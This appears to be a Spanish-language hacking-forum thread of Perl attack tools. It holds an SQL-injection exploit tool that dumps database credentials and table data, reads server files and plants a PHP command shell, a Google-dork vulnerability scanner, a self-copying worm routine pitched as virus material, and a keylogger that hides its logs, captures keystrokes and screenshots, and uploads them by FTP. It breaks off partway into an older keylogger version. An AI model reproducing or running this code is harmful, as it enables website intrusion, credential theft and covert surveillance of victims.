elsif ($opcion eq "2") {
print "\n\n[Tabla] : ";
chomp(my $tabla = <STDIN>);
schemacolumns($_[0],$_[1],$save,$tabla);
&reload;
}
elsif ($opcion eq "3") {
&schemadb($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "4") {
print "\n\n[DAtabase] : ";
chomp(my $data =<STDIN>);
&schematablesdb($_[0],$_[1],$data,$save);
&reload;
}
elsif ($opcion eq "5"){
print "\n\n[DB] : ";
chomp(my $db =<STDIN>);
print "\n[Table] : ";
chomp(my $table =<STDIN>);
&schemacolumnsdb($_[0],$_[1],$db,$table,$save);
&reload;
}
elsif ($opcion eq "6") {
&mysqluser($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "13") {
$t = "logs/webs/$save.txt";
system("start $t");
&reload;
}
elsif ($opcion eq "15") {
&finish;
}
elsif ($opcion eq "14") {
&head;
&menu;
}
elsif ($opcion eq "7") {
&tabfuzz($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "8") {
print "\n\n[Tabla] : ";
chomp(my $tab  = <STDIN>);
&colfuzz($_[0],$_[1],$tab,$save);
&reload;
}
elsif ($opcion eq "9") {
&load($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "10") {
print "\n\n[Table to dump] : ";
chomp(my $tabla = <STDIN>);
print "\n[Column 1] : ";
chomp(my $col1 = <STDIN>);
print "\n[Column 2] : ";
chomp(my $col2 = <STDIN>);
print "\n\n";
&dump($_[0],$col1,$col2,$tabla,$_[1],$save);
&reload;
}
elsif ($opcion eq "11") {
print "\n\n";
&details($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "12") {
print "\n\n[Full Path Discloure] : ";
chomp(my $path = <STDIN>);
&into($_[0],$_[1],$path,$save);
&reload;
}
else {
&reload;
}
}

sub schematables {
$real = "1";
my ($page,$bypass,$save) = @_;
savefile($save.".txt","\n");
print "\n";
my $page1 = $page;
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","[DB] : default");
print "[+] Searching tables with schema\n\n";
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $resto = $1;
$total = $resto - 17;
print "[+] Tables Length :  $total\n\n";
savefile($save.".txt","[+] Searching tables with schema\n");
savefile($save.".txt","[+] Tables Length :  $total\n");
my $limit = $1;
for my $limit(17..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
print "[Table $real Found : $table ]\n";
savefile($save.".txt","[Table $real Found : $table ]");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}
}
sub reload {
print "\n\n[+] Finish\n\n";
<STDIN>;
&head;
&menu_options;
}


sub schemacolumns {
my ($page,$bypass,$save,$table) = @_;
my $page3 = $page;
my $page4 = $page;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
print "\n[DB] : default\n";
savefile($save.".txt","[DB] : default");
savefile($save.".txt","[Table] : $table\n");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns Length : $1 ]\n\n";
savefile($save.".txt","[Columns Length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub schemadb {
my ($page,$bypass,$save) = @_;
my $page1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Searching DBS\n\n";
($pass1,$pass2) = &bypass($bypass);
$page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page.$pass1."from".$pass1."information_schema.schemata");
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $limita = $1;
print "[+] Databases Length : $limita\n\n";
savefile($save.".txt","[+] Databases Length : $limita\n");
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit(0..$limita) {
$code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $control = $1;
if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
print "[Database $real Found] $control\n";
savefile($save.".txt","[Database $real Found] : $control");
$real++;
}
}
}
} else {
print "[-] information_schema = ERROR\n";
}
}

sub schematablesdb {
my $page = $_[0];
my $db = $_[2];
my $page1 = $page;
savefile($_[3].".txt","\n");
print "\n\n[+] Searching tables with DB $db\n\n";
($pass1,$pass2) = &bypass($_[1]);
savefile($_[3].".txt","[DB] : $db");
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
print "[+] Tables Length :  $1\n\n";
savefile($_[3].".txt","[+] Tables Length :  $1\n");
my $limit = $1;
$real = "1";
for my $lim(0..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
savefile($_[3].".txt","[Table $real Found : $table ]");
print "[Table $real Found : $table ]\n";
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub schemacolumnsdb {
my ($page,$bypass,$db,$table,$save) = @_;
my $page3 = $page;
my $page4 = $page;
print "\n\n[+] Searching columns in table $table with DB $db\n\n";
savefile($save.".txt","\n");
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","\n[DB] : $db");
savefile($save.".txt","[Table] : $table");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns length : $1 ]\n\n";
savefile($save.".txt","[Columns length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub mysqluser {
my ($page,$bypass,$save) = @_;
my $cop = $page;
my $cop1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Finding mysql.users\n";
($pass1,$pass2) = &bypass($bypass);
$page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
$code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
if ($code=~/RATSXPDOWN/ig){
$cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n\n[+] Users Found : $1\n\n";
savefile($save.".txt","\n[+] Users mysql Found : $1\n");
for my $limit(0..$1) {
$cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
$code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
print "[Host] : $1 [User] : $2 [Password] : $3\n";
savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
} else {
&reload;
}}}
} else {
print "\n[-] mysql.user = ERROR\n";
}}

sub tabfuzz {
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$count = "0";
savefile($_[2].".txt","\n");
print "\n";
if ($_[0] =~/(.*)hackman(.*)/g) {
my $start = $1; my $end = $2;
print "\n\n[+] Searching tables.....\n\n";
for my $table(@buscar2) {
chomp $table;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))";
$injection = $start.$concat.$end.$pass1."from".$pass1.$table.$pass2;
$code = toma($injection);
if ($code =~/ERTOR854/g) {
$count++;
print "[Table Found] : $table\n";
savefile($_[2].".txt","[Table Found] : $table");
}}}
if ($count eq "0") { print "[-] Not found any table\n";
&reload;
}
}

sub colfuzz {
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$count = "0";
savefile($_[3].".txt","\n");
print "\n";
if ($_[0] =~/(.*)hackman(.*)/) {
my $start = $1; my $end = $2;
print "[+] Searching columns for the table $_[2]...\n\n";
savefile($_[3].".txt","[Table] : $_[2]");
for my $columns(@buscar1) {
chomp $columns;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))";
$code = toma($start.$concat.$end.$pass1."from".$pass1.$_[2].$pass2);
if ($code =~/ERTOR854/g) {
print "[Column] : $columns\n";
savefile($_[3].".txt","[Column Found] : $columns");
}}
} else {
print "\n[Example] : $0 http://127.0.0.1/tester/sql.php?id=-1+union+select+hackman,2,3 hackers\n\n"; &copyright;
}
}

sub load {
savefile($_[2].".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($_[1]);
if ($_[0] =~/(.*)hackman(.*)/g) {
print "\n[+] Searching files with load_file...\n\n\n";
my $start = $1; my $end = $2;
for my $file(@buscar3) {
chomp $file;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(".encode($file)."),char(69,82,84,79,82,56,53,52))))";
$code = toma($start.$concat.$end.$pass2);
if ($code =~/ERTOR854(.*)ERTOR854/g) {
print "[File Found] : $file\n";
print "\n[Source Start]\n\n";
print $1;
print "\n\n[Source End]\n\n";
savefile($_[2].".txt","[File Found] : $file");
savefile($_[2].".txt","\n[Source Start]\n");
savefile($_[2].".txt","$1");
savefile($_[2].".txt","\n[Source End]\n");
}}}}

sub dump {
savefile($_[5].".txt","\n");
print "\n";
my $page = $_[0];
($pass1,$pass2) = &bypass($_[4]);
if ($page=~/(.*)hackman(.*)/){
my $start = $1;
my $end = $2;
print "[+] Extracting values...\n\n";
$concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
$val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
$tota = $1;
print "[+] Table : $_[3]\n";
print "[+] Length of the rows : $tota\n\n";
print "[$_[1]] [$_[2]]\n\n";
savefile($_[5].".txt","[Table] : $_[3]");
savefile($_[5].".txt","[+] Length of the rows: $tota\n");
savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
for my $limit(0..$tota) {
chomp $limit;
$injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
print "[$_[1]] : $1   [$_[2]] : $2\n";
} else {
print "\n\n[+] Extracting Finish\n";
&reload;
}
}
} else {
print "[-] Not Found any DATA\n\n";
}}}

sub encode {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}return $hex;}

sub decode {
$_[0] =~ s/^0x//;
$encode = join q[], map { chr hex } $_[0] =~ /../g;
return $encode;
}

sub finish {
&copyright;
<STDIN>;
exit(1);
}


sub into {
print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
my ($page,$bypass,$dir,$save) = @_;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) {
my $path1 = $1;
my $path2 = $path1;
$path2 =~s/$1//;
$dir =~s/$path1//ig;
$shell = $dir."/"."shell.php";
if ($page =~/(.*)hackman(.*)/ig) {
my  ($start,$end) = ($1,$2);
$code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2);
$code1 = toma("http://".$auth."/".$path2."/"."shell.php");
if ($code1=~/Mini Shell By Doddy/ig) {
print "[shell up] : http://".$auth."/".$path2."/"."shell.php"."\a\a";
savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php");
} else {
print "[shell] : Not Found\n";
}
}
}
}

#blog : doddy-hackman.blogspot.com
#contact : lepuke[at]hotmail[Com]
#The end



Bueno ,este es un scanner en su version grafica ,este programa puede scanear

• SQLI
  
• RFI
  
• LFI
  
• Full Source Discloure
  
  Tambien pueden buscar en google string en google con , los resultados
  son guardados en una carpeta que el programa instalar al ejecutarse
  
  
  Código (perl) [Seleccionar] Expandir
  #!usr/bin/perl
#Googlenator (C) Doddy Hackman 2011

use Tk;
use Tk::ROText;
use Tk::FileSelect;
use URI::Split qw(uri_split);
use Cwd;
use WWW::Mechanize;

if ($^O eq 'MSWin32') {
use Win32::Console;
Win32::Console::Free();
}

my $nave = WWW::Mechanize->new(autocheck => 0);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");

installer();

my $new = MainWindow->new(-background=>"black");

$new->title("Googlenator (C) Doddy Hackman 2011");
$new->geometry("780x530");
$new->resizable(0,0);

$d = $new->Frame(-relief=>"sunken",-bd=>1,-background=>"black",-foreground=>"cyan");
my $scanx = $d->Menubutton(-text=>"Scan",-underline=>1,-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan")->pack(-side=>"left");
my $logsx = $d->Menubutton(-text=>"Logs",-underline=>1,-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan")->pack(-side=>"left");
$d->pack(-side=>"top",-fill=>"x");

$scanx->command(-label=>"SQL",-background=>"black",-foreground=>"cyan",-command=>\&loadsql);
$scanx->command(-label=>"RFI",-background=>"black",-foreground=>"cyan",-command=>\&loadrfi);
$scanx->command(-label=>"LFI",-background=>"black",-foreground=>"cyan",-command=>\&loadlfi);
$scanx->command(-label=>"FSD",-background=>"black",-foreground=>"cyan",-command=>\&loadfsd);

$logsx->command(-label=>"GoogleSearchs",-background=>"black",-foreground=>"cyan",-command=>\&loadgoogle);
$logsx->command(-label=>"SQL",-background=>"black",-foreground=>"cyan",-command=>\&loadfilesql);
$logsx->command(-label=>"RFI",-background=>"black",-foreground=>"cyan",-command=>\&loadfilerfi);
$logsx->command(-label=>"LFI",-background=>"black",-foreground=>"cyan",-command=>\&loadfilelfi);
$logsx->command(-label=>"FSD",-background=>"black",-foreground=>"cyan",-command=>\&loadfilefsd);

my $box = $new->ROText(-background=>"black",-foreground=>"cyan",-width=> 104,-height=> 20)->place(-x =>20,-y=>60);
head();

$new->Label(-background=>"black",-foreground=>"cyan",-text=>"Google : ",-font=>"Impact")->place(-y=>"380",-x=>"20");

my $google = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"30",-text=>"www.google.com.ar")->place(-x=>"80",-y=>"385");

$new->Label(-background=>"black",-foreground=>"cyan",-text=>"Pages : ",-font=>"Impact")->place(-y=>"380",-x=>"300");

my $pages = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"5",-text=>"30")->place(-y=>"385",-x=>"354");

$new->Label(-background=>"black",-foreground=>"cyan",-font=>"Impact",-text=>"Dorks : ")->place(-y=>"380",-x=>"450");

my $dorks = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"40",-text=>"index.php+id")->place(-y=>"385",-x=>"505");

$new->Button(-text=>"Search in Google",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&googler)->place(-y=>"450");
$new->Button(-text=>"About",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&about)->place(-y=>"474");
$new->Button(-text=>"Exit",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&exitx)->place(-y=>"498");

MainLoop;

head();

sub googler {

my $google = $google->get;
my $pages = $pages->get;
my $dorks = $dorks->get;

head();

$box->insert("end","\t\t[+] Searching pages with string $dorks\n\n");

my @webas = google($google,$dorks,$pages);

$box->insert("end","\t\t[+] Cleaning\n\n");
$box->insert("end","\t\t[+] Webs Found ".int(@webas)."\n\n");

for(@webas) {
$new->update();
$box->insert("end","\t\t[Link] : ".$_."\n");
savefile($dorks.".txt",$_);
}

$box->insert("end","\n\t\t[+] All save in logs/search/".$dorks."\n");
$box->insert("end","\t\t[+] Finished\n\n");

}

sub loadsql {

$browse = $new->FileSelect(-directory => "/");
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;

$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
$new->update();
scansql($page);
}

sub scansql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
$box->insert("end","\t\t[+] SQLI : $page\n");
savefilevul("sql-logs.txt",$page);
}}}

sub loadrfi {

$browse = $new->FileSelect(-directory => "/");
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;

$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
$new->update();
scanrfi($page);
}

sub scanrfi {
my $page = shift;
$code1 = toma($page."http:/www.supertangas.com/");
if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD
$box->insert("end","\t\t[+] RFI : $page\n");
savefilevul("rfi-logs.txt",$page);
}}}

sub loadlfi {

$browse = $new->FileSelect(-directory => "/");
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;

$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
$new->update();
scanlfi($page);
}


sub scanlfi {
my $page = shift;
$code1 = toma($page."'");
if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
$box->insert("end","\t\t[+] LFI : $page\n");
savefilevul("lfi-logs.txt",$page);
}}}

sub loadfsd {

$browse = $new->FileSelect(-directory => "/");
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;

$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
$new->update();
scanfsd($page);
}

sub scanfsd {
my $page = shift;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) {
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
$box->insert("end","\t\t[+] Full Source Discloure : $page\n");
savefilevul("fsd-logs.txt",$page);
}}}}

sub head {

$box->delete("0.0","end");

$box->insert("end","
           @@@@     @@@      @@@      @@@@   @@   @@@@ @@   @@    @@   @@@@@@  @@@    @@@@ 
          @@@@@    @@@@@    @@@@@    @@@@@   @@   @@   @@@  @@    @@     @@   @@@@@   @@ @@
         @@@      @@   @@  @@   @@  @@@      @@   @@   @@@@ @@   @@@@    @@  @@   @@  @@ @@
         @@  @@@  @@   @@  @@   @@  @@  @@@  @@   @@@@ @@ @ @@   @  @    @@  @@   @@  @@@@ 
         @@@  @@  @@   @@  @@   @@  @@@  @@  @@   @@   @@ @@@@  @@@@@@   @@  @@   @@  @@@@ 
          @@@@@    @@@@@    @@@@@    @@@@@   @@   @@   @@  @@@  @@  @@   @@   @@@@@   @@ @@
           @@@      @@@      @@@      @@@    @@@@ @@@@ @@   @@  @@  @@   @@    @@@    @@  @@




");
}

sub about {
$about = MainWindow->new(-background=>"black");
$about->title("Googlenator v0.3");
$about->geometry("300x110");
$about->resizable(0,0);
$about->Label(-background=>"black",-foreground=>"cyan")->pack();
$about->Label(-text=>"Contact : lepuke[at]hotmail[com]",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
$about->Label(-text=>"Web : doddyhackman.webcindario.com",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
$about->Label(-text=>"Blog : doddy-hackman.blogspot.com",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
}

sub exitx {
exit(1);
}

sub savefilevul {
open (SAVE,">>logs/vulz/".$_[0]);
print SAVE $_[1]."\n";
close SAVE;
}

sub toma {
return $nave->get($_[0])->content;
}

sub dame_link {
return $nave->find_all_links();
}

sub clean {
if ($_[0] =~/\=/) {
my @sacar= split("=",$_[0]);
return(@sacar[0]."=");
}
}

sub savefile {
open (SAVE,">>logs/search/".$_[0]);
print SAVE $_[1]."\n";
close SAVE;
}

sub google {

for ($pages=10;$pages<=$_[2];$pages=$pages+10) {
$new->update();
toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
@links = dame_link();
for my $l(@links) {
if ($l->url() =~/webcache.googleusercontent.com/) {
push(@url,$l->url());
}
}
}

for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}

my @founds = repes(@founds);

return @founds;
}


sub installer {

unless (-d "logs/") {
mkdir("logs/","777");
mkdir("logs/search","777");
mkdir("logs/vulz","777");
}
}

sub repes {
foreach my $palabra ( @_ ) {
next if $repety{ $palabra }++;
push @revisado,$palabra;
}
return @revisado;
}

sub loadgoogle {
system("start ".getcwd()."/logs/search/");
}

sub loadfilesql {
system("start logs/vulz/sql-logs.txt");
}


sub loadfilelfi {
system("start logs/vulz/lfi-logs.txt");
}


sub loadfilerfi {
system("start logs/vulz/rfi-logs.txt");
}


sub loadfilefsd {
system("start logs/vulz/fsd-logs.txt");
}

# ¿ The End ?


Hola , con esta funcion podran ejecutar word y escribir el texto que quieran, muy util si quieren hacer un virus

Código (perl) [Seleccionar] Expandir

#By Doddy H

use Win32::Clipboard;
use Win32::GuiTest qw(FindWindowLike SetForegroundWindow SendKeys);

sub loadword {

system("start winword.exe");

sleep 4;

SendKeys($_[0]);

}


Ejemplo de uso

Código [Seleccionar] Expandir


loadword("Hola a todos");


Con esta funcion podran reproducir un archivo por todas las unidades disponibles

Código (perl) [Seleccionar] Expandir


#ascii chr(65) = A | chr(90) = Z
#By Doddy H

use File::Copy;

sub wormear {
for my $dir(65..90) {
copy($0,chr($dir).":/");
}
}

Ejemplo de uso

Código [Seleccionar] Expandir



wormear($0);



Hola a todos  , con esta simple funcion vamos a lograr que nuestra computadora logre hablar y nos
diga lo que queremos , aunque solo puede hablar bien en ingles

Código (perl) [Seleccionar] Expandir

#By Doddy H

use Win32::OLE;

sub speak {


my $habla = Win32::OLE->new("SAPI.SpVoice");

$habla->Speak($_[0],0);

}

Ejemplo de uso

Código [Seleccionar] Expandir


speak("Hi brother");


Hola a todos , aca les traigo la nueva version de este keylogger
En esta version ya es aceptable con las siguientes opciones

• Captura letras reconociendo mayusculas y minusculas
  
• Captura ventanas en la que se trabaja
  
• Toma fotos del sistema cada 1 minuto
  
• Sube logs y fotos tomadas por FTP
  
• Oculta rastros
  
  
  
  Código (perl) [Seleccionar] Expandir
  #!usr/bin/perl
#KeyCagator 0.7 (C) Doddy Hackman 2011
#

use Win32::API;
use Win32::GuiTest qw(GetForegroundWindow GetWindowText FindWindowLike SetForegroundWindow SendKeys);
use Win32::Clipboard;
use threads;
use Net::FTP;
use Win32::File;
use Cwd;

my $come = new Win32::API("user32", "GetAsyncKeyState","N", "I");
my $tengo = 0;

if ($^O eq 'MSWin32') {
use Win32::Console;
Win32::Console::Free();
}

hideit($0,"hide");

subirftp("logs.txt","logs.txt");

my $comando1 = threads->new(\&capture_windows);
my $comando2 = threads->new(\&capture_keys);
my $comando3 = threads->new(\&capture_screen);

$comando1->join();
$comando2->join();
$comando3->join();


sub capture_windows {

while(1) {

my $win1 = GetForegroundWindow();        
my $win2 = GetForegroundWindow();

if($win1 != $win2){
my $nombre = GetWindowText($win1);
chomp($nombre);
if ($nombre ne "") {
#print "\n\n[".$nombre."]\n\n";
savefile("logs.txt","\n\n[".$nombre."]\n\n");
}
}
}
return 1;
}

sub capture_keys {

while(1) {

my $test1;
my $test2;

for my $num(0x30..0x39) { #Numbers

if (dame($num)) {
#print "number : ".chr($num)."\n";
savefile("logs.txt",chr($num));
}
}

if (dame(0x14)) {
$test1 = 1;
$tengo++;
}

for my $num(0x41..0x5A) { #Words

if (dame($num)) {

if (dame(0x20)) {
savefile("logs.txt"," ");
}

if (dame(0x32)) {
savefile("logs.txt","\n[enter]\n\n");
}

unless (verpar($tengo) eq 1) {
#print "MAYUSCULA : ".chr($num)."\n";
savefile("logs.txt",chr($num));
}

if (dame(0x10) or dame(0xA0) or dame(0xA1)) {
#print "MAYUSCULA : ".chr($num)."\n";
$test2 = 1;
}

unless ($test1 eq 1 or $test2 eq 1) {
if ($num >= 0x41) {
if ($num <= 0x5A) {
if (verpar($tengo) eq 1) {
#print "MINUSCULA : ".chr($num+32)."\n";
savefile("logs.txt",chr($num+32));
}
}
}
}
}
}
}
return 1;
}

sub capture_screen {

$numero = 0;

while(1) {

sleep 60;

$numero++;

SetForegroundWindow(1);
SendKeys('%{PRTSCR}');

my $a = Win32::Clipboard::GetBitmap();

open (FOTO,">".$numero.".bmp");
binmode(FOTO);
print FOTO $a;
close FOTO;

hideit($numero.".bmp","hide");
subirftp($numero.".bmp",$numero.".bmp");
}
}

sub dame {
return($come->Call(@_) & 1);
}

sub savefile {

open (SAVE,">>".$_[0]);
print SAVE $_[1];
close SAVE;

hideit($_[0],"hide");

}

sub hideit {
if ($_[1] eq "show") {
Win32::File::SetAttributes($_[0],NORMAL);
}
elsif ($_[1] eq "hide") {
Win32::File::SetAttributes($_[0],HIDDEN);
}
else {
print "error\n";
}
}

sub subirftp {

if ($ser = Net::FTP->new("localhost")) {
if ($ser->login("doddy","123")) {
print "subi".getcwd()."/".$_[0]."\n";
if ($ser->put(getcwd()."/".$_[0],$_[1])) {
return true;
}
}
$ser->close;
}


}

sub verpar{
return ($_[0] % 2 == 0) ? "1" : "2";
}


#Credits : to explorer for helpme with the function verpar()
#Mail : lepuke[at]hotmail[com]
#Blog : doddy-hackman.blogspot.com
# ¿ The End ?


Bueno , este es un keylogger en perl que hice con las siguientes opciones

* Captura teclas reconociendo mayusculas y minusculas
* Muestra ventanas en las que se esta trabajando

Pocas opciones pero mejor la version anterior

Código (perl) [Seleccionar] Expandir

#!usr/bin/perl
#KeyCagator 0.4 (C) Doddy Hackman 2010
#

use Win32::API;
use Win32::GuiTest qw(GetForegroundWindow GetWindowText);

my $come = new Win32::API("user32", "GetAsyncKeyState","N", "I");
